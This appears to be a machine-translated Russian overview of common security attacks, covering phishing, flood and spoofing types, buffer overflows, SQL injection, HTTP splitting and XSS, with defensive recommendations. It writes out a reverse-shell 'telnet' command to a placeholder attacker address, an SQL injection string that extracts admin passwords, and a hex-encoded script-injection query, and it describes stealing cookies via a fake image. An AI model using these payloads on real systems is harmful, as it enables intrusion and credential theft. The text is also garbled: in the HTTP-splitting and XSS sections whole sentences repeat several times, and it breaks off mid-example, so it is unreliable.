Common Security Threats

Everyone probably knows that there are so many different ways to threaten security. There are really enough of them, how many of them you will learn by reading under the cut.


All links used below are taken as an example if they lead somewhere to the wrong place.

The article is also available at: forxakep.ucoz.ru/publ/3-1-0-16
forum.netall.ru/index.php?showtopic=125182&st=0&p=1573116&#entry1573116
www.inattack.ru/article/402 .html

Fishing (or Phishing).

A very broad concept. Its meaning is to get information from users (passwords, credit card numbers, etc.) or money. This technique is aimed not at one user, but at many. For example, letters allegedly from a technical support service are sent to all known customers of a bank. The letters usually contain a request to send the password to the account, allegedly because of any technical work. Despite the fact that users are warned that none of the employees can demand any such information from them, and this information should not be disclosed, there are always those who are happy to give their numbers, passwords, etc. Such letters are usually very believable and well-composed, which may bribe gullible users. It’s necessary to make a reservation that there are several methods for phishing, in addition to letters. Some of the following techniques, when used correctly, are suitable for phishing (as a rule, we mention this in the description of the technique).
Recommendations: Remember that paranoia is the best defense. Do not trust anything suspicious, do not share your data with anyone. Administrators do not need to know your password if it is designed to access their server. They completely control the server and can see the password themselves or change it.

Social engineering

Not a technical, but a psychological technique. Using the data obtained during the inventory, the cracker can call some user (for example, a corporate network) on behalf of the administrator and try to find out from him, for example, the password. This becomes possible when in large networks, users do not know all the employees, and even more so, they can not always accurately recognize them by phone. In addition, complex psychological techniques are used, so the chance of success is greatly increased.
Recommendations: the same. If there really is a need, then provide the necessary data in person. In the event that you wrote down the password on paper, do not leave it anywhere and destroy it if possible, and not just throw it in the trash.

Viruses.

The most known to the simple user problem. The bottom line is the introduction of malware into the user's computer. The consequences can be different and depend on the type of virus with which the computer is infected. But in general - from stealing information to sending spam, organizing DDoS attacks, as well as gaining full control over the computer. In addition to the file attached to the letter, viruses can get into the computer through some OS vulnerabilities, which are described in our article “Windows Vulnerability Rating”. There are many viruses, but it is still possible to classify them. We do not want to reinvent the wheel, so you can use the information on this page school8.uriit.ru/people/av/class.html where the classification of viruses with a description is given. This topic is covered in more detail here.fivt.krgtu.ru/kafedri/mo/site/ANTIVIRUS/pages/02.htm
Recommendations: Use antivirus software. Do not limit yourself only to DrWEB or Kaspersky Anti-Virus (because they do not check the registry), use specialized antiviruses against Malware, for example Ad-Aware, SpyBot, XSpy. And also do not open suspicious attachments and do not open programs from unknown senders at all. Even if the sender is familiar to you, still check the antivirus first. Here, as in medicine, it is easier to avoid than to cure later.

DoS (Denial of Service or Denial of Service).

I wanted to say that this is rather not a separate attack, but the result of the attack; used to disable a system or individual programs. To do this, the cracker in a special way forms a request for a program, after which it ceases to function. A reboot is required to return the program to operational status. It is often believed that DoS is the same as an attack of the Flood type and that all attacks that lead to a system crash under the general name of DoS should be combined. It is worth mentioning that:

- There is no general terminology, there are rather unspoken rules by which an attack is classified, so even within the framework of this article we will give a somewhat common classification.
- As we already said, not only Flood, but, for example, Buffer Overflow, can lead to a denial of service.

Therefore, DoS can be described as the result of an attack. For example: “The denial of service effect is achieved by using a Flood attack.”

Flood (Flood or Stream / Flooding)

This type is quite controversial, in part it can be attributed to DoS, but we would like to highlight it separately. From a number of machines (in this case, the attack will be called DDoS Distributed Denial of Service. Distributed denial of service attack), as a rule, Zombies send the victim the maximum possible number of requests (for example, connection requests). From this, the victim does not have time to respond to each request, and as a result does not respond to user requests, i.e. we can say that it ceases to function normally. Note: this type of attack can be called hooliganism, when, for example, forums are filled with a large number of meaningless messages. The following Flood types can be distinguished:

--SYN Flood - Flooding the attacked computer with SYN packets. As you know, a computer should respond to such a packet with a packet of the SYN / ACK type. If there are too many SYN packets, then the computer does not have time to respond to each and cannot receive packets from other computers.
--ICMP Flood or Ping Flood - Same thing, only ICMP packets. The system should respond to such a packet, thereby creating a large number of packets that reduce the performance (bandwidth) of the channel.
--Identification Flood (Ident Flood). It is similar to ICMP Flood, but the response to the request for port 113 of type identd takes longer for the system, so the attack is more effective.
--DNS Flood - the attack is directed to the DNS server. They are flooded with DNS queries that the server does not have time to respond to, so it will not be able to respond to your queries either. As a result, you will not be able to visit Internet sites.
--DDoS DNS - The attack is quite new, and we did not meet the "well-established" name. In fact, this technique is approximately the same as the previous one, with the only difference being that requests come from a large number of machines (the previous type does not exclude this). The address at which the DNS server should respond to these requests is equal to the address of the DNS server itself, i.e. he is not only inundated with DNS queries, but he also sends them to himself. Thus, the reception is more effective than the previous one, but also more difficult to implement.
--Boink (Bonk, Teardrop) - A huge number of highly fragmented packets are sent to the victim, but fragments are large. For each fragmented packet, a special buffer is allocated, in which later other fragments will be placed, so that they can be put together later. A huge number of large fragments overflow buffers and can cause a freeze or crash.
--Pong is the same as any other of the above types, the only difference is that the sender address is fake. This gives the cracker some anonymity.

Recommendations: for each OS or router its own; they are usually given in the technical documentation. Do not neglect them, clearly limit the number of valid packets. Unfortunately, some species can not be reflected in anything other than physical disconnection. Properly configured firewalls (or Firewalls) are often a panacea.

Smurf (attack aimed at TCP-IP protocol implementation errors)

Now this type of attack is considered exotic, but earlier, when the TCP-IP protocol was fairly new, it contained a number of errors that allowed, for example, to replace IP addresses. However, this type of attack still applies. Some experts point out TCP Smurf, UDP Smurf, ICMP Smurf. Of course, this division is based on the type of packages.
Recommendations: CISCO switches provide good protection, like many others, as well as the latest software and firewalls; need to block broadcast requests.

Ping-of-Death (or Jolt, SSPing)

The attack is that a fragmented ICMP packet is sent to the victim, but the fragment size is very large (64kB). Older versions of the OS, such as Windows 95, hang. This attack can be carried out using the Shadow Security Scanner.
Recommendations: it is easiest to update the OS by abandoning the old version.

UDP Storm (UDP Storm)

It is used if at least two UDP ports are open on the victim, each of which sends a response to the sender. For example, port 37 with the time server sends the current date and time to the request. The cracker sends a UDP packet to one of the victim's ports, but as the sender indicates the address of the victim and the second open UDP port of the victim. Then the ports begin to respond endlessly to each other, which reduces performance. The storm will stop as soon as one of the packets disappears (for example, due to resource overload).
Recommendations: if possible, exclude the use of services that accept UDP packets, or cut them off from the external network with a firewall.

UDP Bomb

The cracker sends a UDP packet with invalid service data fields to the UDP system. Data can be violated as you like (for example, incorrect field length, structure). This can lead to a crash.
Recommendations: update the software.

Land

A packet is sent to the victim on a specific port, but the sender's address is set to the same as the victims, and the sender's port is equal to the recipient's port. (example: receiver: 1.1.1.1 port 111 sender: 1.1.1.1 port 111). The victim is trying to establish a connection with himself, which could cause the system to hang. A similar attack can also be 100% effective against some routers.

Mail Bombing

If the attacked computer has a mail server, then a huge number of mail messages are sent to it in order to disable it. On the one hand, this is reminiscent of Flood, but on the other hand, if messages contain large attachments that will be scanned by server antivirus, such a scan of many incoming attachments can significantly reduce performance or nullify it. In addition, such messages are stored on the server’s hard disk and can overflow it, which can cause DoS. Of course, now this attack is more of a story, but in some cases it can still be used.
Recommendations: proper configuration of the mail server.

Sniffing

In the event that hubs are installed instead of the switches in the network, the received packets are sent to all computers on the network, and then the computers determine this package for them or not. If the cracker gains access to a computer that is included in such a network, or gains access to the network directly, then all the information transmitted in the redistribution of the network segment, including passwords, will become available. The cracker simply puts the network card in listening mode and will accept all packets regardless of whether they were intended for him. It can be used as console sniffers, for example TcpDump (built-in * NIX systems), WinDump (for Windows, but not built-in), as well as with a visualized interface, for example Iris.
Recommendations: use switches instead of hubs, encrypt traffic.

IP Hijack

If there is physical access to the network, then the cracker can "crash" into the network cable and act as an intermediary in the transmission of packets, thereby he will listen to all traffic between the two computers. A very inconvenient method that often does not justify itself, except when no other method can be implemented. Such inclusion in itself is inconvenient, although there are devices that simplify this task a little, in particular, they monitor the numbering of packets in order to avoid failure and possible detection of intrusion into the channel. This method is used to trick ATMs, but such a case is technically more difficult, because the connection between the bank and the ATM is unacceptable, and "plunging" into the channel without breaking it is a task only for a highly qualified specialist. In addition, now ATMs are installed much better,

Recommendations: watch for access to cables, for example, use boxes. Encrypt traffic.

Dummy ARP (False ARP)

An ARP server, router, or switch knows which IPs belong to MAC addresses (i.e. network cards). If physical access to the network is possible, an attacker can fake an ARP response and pretend to be another computer on the network, having received its IP. Thus, all packages destined for that computer will be received by him. This is possible if that computer is turned off, otherwise this action will cause a conflict of IP addresses (on the same network there cannot be 2 computers with the same IP address).
Recommendations: use software that informs you about changes in MAC addresses for IP, watch for ARP server log files.

Dummy DNS Server (False DNS Server)

If the network settings are set to automatic, then when you turn on the network, the computer “asks” (ie, sends a broadcast packet) who will be its DNS server, to which it will send DNS queries in the future. With physical access to the network, an attacker can intercept such a broadcast request and respond that his computer will be a DNS server. After that, he will be able to send the deceived victim along any route. For example, the victim wants to go to the bank’s website and transfer the money, the cracker can send it to his computer, where the password entry form will be fabricated. After that, the password will belong to the cracker. This is a rather complicated method, because an attacker needs to respond to the victim earlier than the DNS server.

Recommendations: if possible, restrict access to the network of strangers.

Fuzzy

Filters can be configured to block certain types of packets, such as UDP. An attacker can fabricate a packet so that the filter does not understand that this UDP packet does not filter it, and it gets to its destination. In this way, an attacker can bypass packet filters. This technique is very narrow and is intended for special cases, more precisely those when the connection does not have to be two-way. Two-way communication will be impossible in most cases, because basically, if incoming packets of a certain type are blocked on any port, then outgoing packets are blocked. It turns out that even if the fabricated packet passes through the filter (for example, to the UDP port), the server will respond to it with a packet of the same type, i.e. UDP, but at the same time he will not fabricate it according to the example of a cracker. T.O. this outgoing packet will be filtered out and will not reach the cracker.
Recommendations: usually newer versions of firewalls provide sufficient protection against this technique.

Puke

The cracker fabricates an ICMP unreachable response (remote system error), which will provoke the client to disconnect from the server. It is used more likely as an auxiliary tool, in the event that any client must be disconnected from the server for an attack.
Fake unreachable - the cracker fabricates a message that the package cannot be delivered (unreachable), thereby causing the server to think that the client has a failure and the packages are not being delivered as intended. This may cause the server to disconnect the client. Also, an auxiliary tool, similar to No. 17, is only aimed not at the client, but at the server.

IP-Spoofing (Spoofing or IP Substitution)

The attacker replaces his real IP with a fictitious one. This is necessary if only certain IP addresses have access to the resource. An attacker needs to change his real IP to “privileged” or “trusted” in order to gain access. This method can be used differently. After the two computers have established a connection between themselves, checking the passwords, the cracker can cause the victim to overload network resources with specially generated packets. Thus, he can redirect traffic to himself and thus bypass the authentication procedure.
Recommendations: there can be many of them, for the reason that there are a lot of techniques. But it is worth mentioning that the threat will be reduced (but legitimate connections may make it harder) by reducing the response packet time with the SYN and ACK flags set, as well as increasing the maximum number of SYN requests to establish a connection in the queue (tcp_max_backlog). You can also use SYN-Cookies.
Host spoofing. A very sophisticated technique that requires physical access to the network. Each computer knows the router to which it sends all packets, which are then delivered by the router to the destination. When the router is changed, a redirect notification is sent to each computer, after which the computers begin to send packets to the new router. An attacker can fabricate such a notification and impersonate a router so that he gains control over traffic within the network segment.
Recommendations: control over network access and the moment the router is changed. For example, you can monitor whether all past traffic (ie old connections) has “appeared” on the new router.

Password guessing.

Used to register in the system by selecting an account password. There are two types: selection of all possible combinations of characters (BruteForce) and selection by dictionary. The first method is more effective, because there’s still a combination of characters that you entered as a password from the keyboard, but this method is extremely slow, especially if punctuation is taken into account, etc. The second method is quick, but if you entered a word that cannot be in the dictionary, for example: “My-New-Password”, then it will be impossible to select it from the dictionary. There are a lot of programs that serve to select a password, so we don’t think it makes sense to name any specific ones. As a rule, programs, OS, etc. store passwords in encrypted form, so even if an attacker gained access to the file, he will have to decrypt the password.
Recommendations: use complex passwords, preferably with punctuation marks. Limit the number of password attempts. Against decryption of the password, only its complexity will help.

Back Connect / Pipes / Reverse

This is an auxiliary technique, but in itself it is very interesting. For example, an attacker does not want to perform many actions every time for the sake of one command. He can simplify the task using this technique. Its essence is that the cracker forces the attacked computer to connect to the cracker's computer. For example, on the attacked computer, you can run the telnet [ip.addresser] [port] command. After that, the cracker, in fact, receives a command line (command shell or Shell / Shell) on the attacked computer.

Software vulnerabilities

Using bugs in software. The effect may be different. From receiving non-essential information to gaining full control over the system. Attacks through software bugs are the most popular at all times. Old bugs are fixed with new versions, but new bugs appear in new versions that can be used again. Further we will describe not the types of attacks, but the methods used to attack software errors. Recommendations: we’ll give it right away for everyone, because the recommendation is general - only “safely” written program code will help. On this topic you can find a large amount of material on the Internet.

Buffer Overflow

A very dangerous type of attack is when a request is formed in such a way that it overflows the memory frames allocated to it and the “sewn” commands in the request get on the stack, and then are executed by the processor. This can be done both remotely and locally, if the cracker can run his program on the attacked computer. This can be used both for executing code on a computer, and for raising rights. There are several types of buffer overflow attacks. We will not describe each of them, because to explain the principle, we have to give examples of code that will be incomprehensible to people unfamiliar with programming. The classification below belongs to Andrey Kolishchak (andr [at] sandy.ru) and is in his article “Attacks on buffer overflow”. Therefore, you can find their description, examples and recommendations directly in this article.

--- Attack “failure of the stack”
--- Attack “failure of the stack” with parameterization
--- Attack “failure of the stack” with control transfer
--- Distorting function pointers
--- Attack on function pointers
--- Attack on function pointers with parameterization
--- Attack on function pointers with control
transfer
--- Attack transition tables --- Attack on transition tables
--- Attack on transition tables with parameterization
--- Attack on transition tables with control
--- Data pointer distortion
-
- Attack with distortion of data pointers --- Attack with distortion of data pointers with parameter izatsii
--- Attack with distortion of data pointers with the original code.

We would like to bring one more type to the above classification: Integer Overflow (Integer Overflow). For more information, see the article “Integer Overflow: Attack” and “Integer Overflow: Protection” or “Basic Integer Overflows” from Blexim.

Shatter

A vulnerability in Windows systems that can only be used locally. It is very similar to a buffer overflow, or rather it leads to the same result: cracker commands hit the stack. It is based on the fact that every window in Windows that has an input field has a maximum length of the input value. It is installed at the stage of program development, and for small fields it can be, for example, 50. You cannot enter the number of characters greater than 50 from the keyboard, but the operation of Windows windows is based on Messages. You can easily get the Header (Header or Header (special, intended only for the OS)) input fields and send a SETTEXT (set text) message (using this header) to the input field. The message should say that it is necessary to set a text longer than 50, respectively, everything that will be after the 50th character, will hit the stack and be executed by the processor. There is no protection against this. The only panacea is AMD Athlon 64 processors, which have built-in protection and do not execute commands from the stack.

Nuke (WinNuke or Nuke)

Now this is more of a story. Windows by default uses the NetBIOS protocol to share files and printers on the network. To do this, the OS opens three TCP ports (137, 138, 139). The implementation of this protocol on older versions of Windows contained a vulnerability. The bottom line is that you can send several OutOfBand "messages" in a row to open port 139. The system could not correctly process such data and the system hung. A lot of programs have been written for such attacks, but we will only mention the Shadow Security Scanner, which we have already named as a tool for SSPing.

Cross User Attack

In our opinion, a rather ambiguous name, because not the best way reflects the essence of the attack, but nevertheless we stick to this well-known name. Squid 2.4 and ISA / 2000 allow users to share TCP connections with a server. Using HRS (described below), two responses from the server can be triggered, one of which will be controlled by the cracker and falsify the information received by the user.
Attack on CGI. Most WWW (Web) servers use scripts to provide users with additional services or provide additional features. For example, mail servers like mail.ru. Many servers have “self-written” CMS (Content Management System or Content Management System (site)). Programmers do not always force their scripts to check the values ​​entered by the user, which makes it possible to use such oversights for various purposes. A buffer overflow attack can also be carried out through CGI script errors. For example: http: // host / cgi-bin / helloworld? Type = A * 100 (i.e. the letter A will be 100 times). At the address http://www.opennet.ru/base/sec/linux_sec_guide.txt.htmlYou can find an excellent article in the second part of which describes security problems that are usually ignored by CGI programmers. Many are not hacking methods, but only help hacking, so to write good code it is better to read the article. The scope of our article does not allow us to delve into the topic of writing safe code, so we only say that you need, at a minimum, to filter all the service characters from the received data.

SQL Injection

If the data entered by the user is used in the generated SQL queries without verification, then the cracker can enter data that will allow him to get any information from your SQL databases. For example: there is a request “SELECT login, password FROM members where email = '$ email';” Where $ email is entered by the user in the table, the request is processed and the result is displayed on the page. An attacker can modify the data and enter into the form: "my@mail.ru 'OR login LIKE'% admin%”. Thus, the generated SQL query will be: "SELECT login, password FROM members where email='my@mail.ru 'OR login LIKE'% admin% ';". Thus, the cracker will receive passwords from users whose login contains admin.

HRS (HTTP Resource Splitting)

A fairly young and, in our opinion, complicated trick (if you do not use it only for XSS), which allows you to implement attacks like Hijacking Pages, Cross User Defacement, Web Cache Poisoning, Browser Cache Poisoning, XSS (will be described below). The essence of the attack is that an attacker using a specially prepared HTTP request can force a Web server vulnerable to HRS to respond to the victim (and not to the attacker) with two separate HTTP responses (and not one, as it would be in a normal situation). The first HTTP response can be partially controlled by the cracker, but the second is completely controlled by the cracker! If possible, the cracker sends two requests where the victim is already an intermediary. The first of these requests will again cause the Web server to respond twice, and the second usually requests a secondary resource on the server (for example, some small picture). But! The victim will combine the second HTTP request (to a secondary resource) with the second HTTP response (which is controlled by the cracker)! Thus, the victim thinks that the resulting “aggregate” is a response from the Web server with part of its contents, but in fact it will be important information or a command (which was prepared by the cracker). There is one more nuance, the victim may be an attacker’s computer, which will receive important information, for example, another user's cookie as a result of the attack. Below we describe the attacks that can be carried out through HRS, but they can also be carried out using a different trick, but we will say about them all the same in the HRS key. that the resulting “aggregate” is a response from the Web server with part of its contents, but in fact it will be important information or a command (which was prepared by the cracker). There is one more nuance, the victim may be an attacker’s computer, which will receive important information, for example, another user's cookie as a result of the attack. Below we describe the attacks that can be carried out through HRS, but they can also be carried out using a different trick, but we will say about them all the same in the HRS key. that the resulting “aggregate” is a response from the Web server with part of its contents, but in fact it will be important information or a command (which was prepared by the cracker). There is one more nuance, the victim may be an attacker’s computer, which will receive important information, for example, another user's cookie as a result of the attack. Below we describe the attacks that can be carried out through HRS, but they can also be carried out using a different trick, but we will say about them all the same in the HRS key.

Cross User Defacement

The “narrow” method is enough, because an attacker fakes a page that is sent by a vulnerable Web server to only one victim. At the same time, the contents of the Web server do not change in any way. In addition, the reception is very difficult to conduct not with the help of HRS. The cracker will have to act as an intermediary between the client and the server using Spoofing, IP heijack, or errors in the implementation of some Web servers, but in the end the "costs" will not justify the result. It is easier to implement this through an inter-user attack.

Web cache poisoning

In my opinion, this is not a very useful technique, so I will describe it extremely briefly. Basically, proxy servers cache the pages requested by users, so that upon repeated request of such a page, return it from the cache rather than request a Web server. This is necessary to save traffic if it is a corporate network and an intranet proxy server. The essence of the reception is to provoke a proxy server to cache a fake page, which will then be transmitted to network users.
Browser Cache Poisoning. Not only proxy servers have caches, but also browsers. In essence, this technique is almost the same as Web Cache Poisoning, with the only difference being that only one computer is exposed to it.

Hijacking pages

To some extent, this technique is similar to an inter-user attack, but here the goal of the attack is not to "forge" the user forged information, such as a Web page, but rather, to make the server forward the Web page that was intended to another user to the attacker. In this way, an attacker can obtain important information intended for another user. This can be his account number or the password given to him. To conduct an attack, an attacker needs a TCP connection with a proxy server (let's call it “VSP”), a TCP connection between the victim and a proxy server (“ZhSP”) and a TCP connection between the Web server and the proxy server (“SSP”). The scheme is as follows:

--- The cracker sends a request (let's call “FOR”) through the “VSP” to the proxy server, to which the Web server must respond with two “answers” ​​“OF1” and “OF2” (HRS case).
--- The proxy server sends an “FOR” request to the Web server through the “BSC”.
--- The web server responds with “OF1” and “OF2” through “MTP”.
- The proxy server believes that “OF1” is a response to “FOR” and sends it to the cracker through “VSP”.
--- The victim sends a request to the proxy server for the request “ЗЖ” through the “ZhSP”. To which the Web server should respond with the “OS” page, which contains important information.
--- The proxy server sends “ЗЖ” to the Web server via “ССП”, but immediately accepts the fake “ОF2” for the response of the Web server.
--- The proxy server sends “ОF2” to the victim through “ZhSP” as a response to the request “ЗЖ”.
- The cracker again sends the proxy server a new request "ZA2" through the "VSP".
- At this time, the proxy server receives a response from the Web server to “ZZ” through “MTP”.
--- In this case, the proxy server still sends “ZA2” to the Web server through “SSP”, but then it takes “OS” for the response to “ZA2”.
- The proxy server sends the "OS" to the cracker through the "VSP". T.O. the cracker achieved his goal, he received a page that was intended for the victim.

Further, the proxy server will receive a response to the last request of the cracker, but at that time there will be no one to give this page to, and it will most likely be deleted. We think that after considering this scheme, it became clear that the attack is not as difficult to implement in theory as it is difficult in practice. It requires a precisely planned time after which requests will be sent and, accordingly, accurate data will be required, after which time answers to requests will be received.

CSS / XSS (Cross-Site Scripting or Cross-Site Scripting)

The attack, which was never recognized by Microsoft as dangerous, is based on the use of Java Script in the page. As you know, Java code, "sewn" into the page, is executed by the user's browser. The possibilities are quite limited, but in the right hands the available opportunities can be very effectively used. For example, many forums or mail servers can identify a user by the presence of a certain cookie on the user's computer. It is unique for everyone and therefore it is considered safe enough to identify the user to access information of low importance only by its presence, without entering a password. But cookie can be stolen! An attacker can inject a code like: "" into the page, and create a snf.jpg file on his website, which will actually be a script and will write data received through document.cookie to the file. Thus, each user who visits the forum page where the cracker has embedded the above code (for example, instead of a picture) will “present” his cookie to the cracker, which can later be used by the cracker to register on the forum. Even if external links to images are not allowed, but it is possible to download them, then one filter for the extension (so that it was, for example, JPG) is not enough. Therefore, the attack will still be successful if the JAVA code is contained in the file body (for example: “photo.jpg”). If the server is susceptible to an XSS attack, then the client can protect itself from it by disabling the execution of Java Script in its browser. Of course, after this some pages may not work correctly. which can later be used by the cracker to register on the forum. Even if external links to images are not allowed, but it is possible to download them, then one filter for the extension (so that it was, for example, JPG) is not enough. Therefore, the attack will still be successful if the JAVA code is contained in the file body (for example: “photo.jpg”). If the server is susceptible to an XSS attack, then the client can protect itself from it by disabling the execution of Java Script in its browser. Of course, after this some pages may not work correctly. which can later be used by the cracker to register on the forum. Even if external links to images are not allowed, but it is possible to download them, then one filter for the extension (so that it was, for example, JPG) is not enough. Therefore, the attack will still be successful if the JAVA code is contained in the file body (for example: “photo.jpg”). If the server is susceptible to an XSS attack, then the client can protect itself from it by disabling the execution of Java Script in its browser. Of course, after this some pages may not work correctly. then the client can protect itself from it by disabling the execution of Java Script in its browser. Of course, after this some pages may not work correctly. then the client can protect itself from it by disabling the execution of Java Script in its browser. Of course, after this some pages may not work correctly.

SiXSS (SQL Injection Cross Site Scripting)

It is a combination of SQL Injection and XSS, i.e. executing an XSS attack through a SQL Injection script vulnerability. The attack is based on the fact that recent versions of MySQL can translate hexadecimal values ​​(of the form 0xXX) into text. For example, through an SQL query, you can find out that the hexadecimal value of the string "" is "3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E". Now if there is a script vulnerable to SQL Injection, then you can ask this query: www.victim.com/vuln_script.php ? vuln_variable = 1 + union + select + 0x3C7363726970743E616C6572742822536958535322293B3C2
F7363726970743E We hope that the vuln_variable or vuln_script entries are clear to you that this is a vulnerable variable and a vulnerable script, respectively. As a result, we get a window with the text SiXSS, which means that the attack was successful. The code is extremely harmless, so you can check it yourself. Such an attack is very specific, so we consider it necessary to discuss it in more detail. Unlike XSS, this attack is used in phishing, if modified. In addition, it’s rather difficult to embed such code in someone else’s page, because the “working” scripts in their hexadecimal value are very long and may go beyond the acceptable values, therefore it is easier to provide a similar link separately as text than to “sew it”. Of course, many users can say that they will never open a link if they see SQL query elements in it, for example, “UNION”, however, there is a pitfall: it is easy to hide the link from the human eye, make it unrecognizable. For example, the entry% F1% F1% FB% EB% EA% E0 is completely incomprehensible to the eye, but will be correctly perceived by the browser and server. In addition, there are several ways to mask the link, so it will be easy to make a mistake. In addition, many email clients prefer not to show the entire link, but to show only the beginning, so SQL fragments can be simply hidden. Therefore, either do not trust unknown senders, even if they introduce themselves as bank managers, or turn off JAVA. But the first option is still preferable. From personal experience it can be said that once a similar letter came from the bank manager, where in the “sender” field there was an entry “Apex Bank PLC”, however, the return address was apexbnkplcc@yahoo.co.uk It is clear that he was a scammer, because the bank will never trust the processing of its mail to free mail servers. Carefully check the return address and do not believe in easy money!

SiHRS (SQL Injection HTTP Resource Splitting)

Reception implements HTTP Resource Splitting through a script vulnerability to SQL Injection. This becomes possible if the script, for example, by index, first accesses the SQL database for the HTTP address, and then it generates its HTTP request and uses the HTTP address received from the SQL database to substitute its HTTP request in the "Location:" field. This is often used in Internet directories of sites. We can give an example of an HTTP header that can be used for SiHRS in hexadecimal.
Select HEX Code ('i.php'
Content-Length: 0

HTTP / 1.1 200 OK
Content-Ty